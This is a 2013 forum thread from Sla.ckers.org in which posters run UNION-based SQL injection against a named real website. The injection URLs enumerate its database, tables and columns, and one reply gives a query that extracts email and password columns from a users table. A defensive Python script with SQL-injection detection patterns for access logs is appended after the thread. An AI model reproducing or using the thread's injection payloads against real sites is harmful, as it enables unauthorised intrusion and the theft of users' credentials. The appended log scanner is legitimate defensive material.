Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
i can't extract data !!!!
Posted by: versus
Date: May 21, 2013 05:16PM

ok i can get data :

vuln link :

http://faucherbotanix.com/detail.php?id=12'

easy part :

http://faucherbotanix.com/detail.php?id=-12 union all select 1,user(),3,version(),5,database()-- -

ok now
http://faucherbotanix.com/detail.php?id=-12 union all select 1,table_name,3,4,5,6 from information_schema.tables--

i can find : users

now column of users

http://faucherbotanix.com/detail.php?id=-12 union all select 1,column_name,3,4,5,6 from information_schema.columns where table_name=CHAR(117, 115, 101, 114, 115) limit 1,1-- -

i get

username

so when i want to see this username i'm blocked :(

http://faucherbotanix.com/detail.php?id=-12 union all select 1,username,3,4,5,6 from users--

i get :

Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /nfs/c07/h04/mnt/110601/domains/faucherbotanix.com/html/detai


any help :) thanks

Re: i can't extract data !!!!
Posted by: annen
Date: May 22, 2013 01:07AM

Tables found: Departement,Horaire_employe,Jour,circulaires,employe,horaires,produits,semaine,slider
no "users" table in current db.
you'd find which db has the table "users"!

Re: i can't extract data !!!!
Posted by: annen
Date: May 22, 2013 01:10AM

http://faucherbotanix.com/detail.php?id=-12 union all select 1,2,3,email,5,password from db110601_cai.users--+-

Re: i can't extract data !!!!
Posted by: versus
Date: May 22, 2013 11:51AM

thanks annen :) ;)

Re: i can't extract data !!!!
Posted by: hack2012
Date: June 02, 2013 02:12AM

on table users
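
Added example, not part of the original thread or written by its posters: a Python check a defender could run over web access logs to flag the request progression shown in this thread (quote probe, UNION SELECT, information_schema enumeration, CHAR()-encoded literal, table read from another database). The request lines are constructed, and the assumption that `id` on `detail.php` should only ever be a positive integer is mine.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed request paths modelled on the stages in the thread (not real log data).
SAMPLE_REQUESTS = [
    "/detail.php?id=12",
    "/detail.php?id=12%27",
    "/detail.php?id=-12+union+all+select+1,user(),3,version(),5,database()--+-",
    "/detail.php?id=-12%20union%20all%20select%201,table_name,3,4,5,6"
    "%20from%20information_schema.tables--",
    "/detail.php?id=-12+union+all+select+1,column_name,3,4,5,6+from+information_schema"
    ".columns+where+table_name=CHAR(117,115,101,114,115)+limit+1,1--+-",
    "/detail.php?id=-12+union+all+select+1,2,3,col_a,5,col_b+from+otherdb.users--+-",
]

# Each rule names one stage; patterns run on the URL-decoded parameter value.
RULES = [
    ("union_select", re.compile(r"\bunion\b(\s+all)?\s+select\b", re.I)),
    ("schema_enumeration", re.compile(r"\binformation_schema\s*\.", re.I)),
    ("char_encoded_literal", re.compile(r"\bchar\s*\(\s*\d+", re.I)),
    ("sql_comment_tail", re.compile(r"(--|#)\s*[-+]?\s*$")),
    ("cross_db_table", re.compile(r"\bfrom\s+(?!information_schema\b)\w+\.\w+", re.I)),
]

def classify(request_path, param="id"):
    """Return sorted rule names hit by `param`; an empty list means the value is clean."""
    query = urlsplit(request_path).query
    hits = set()
    # parse_qs decodes %xx and '+', so encoded and plain variants match the same rules.
    for value in parse_qs(query, keep_blank_values=True).get(param, []):
        if re.fullmatch(r"\d+", value):
            continue  # assumption: a legitimate id is a positive integer and nothing else
        hits.add("non_numeric_id")
        hits.update(name for name, pattern in RULES if pattern.search(value))
    return sorted(hits)

def scan(requests):
    """Map each flagged request to its rule hits, skipping clean ones."""
    return {r: h for r in requests if (h := classify(r))}

if __name__ == "__main__":
    for request, hits in scan(SAMPLE_REQUESTS).items():
        print(", ".join(hits), "<-", request)
```

The `non_numeric_id` check is the one that matters most: the same integer-only rule enforced in the application, together with a parameterized query, closes the hole that the other rules only observe.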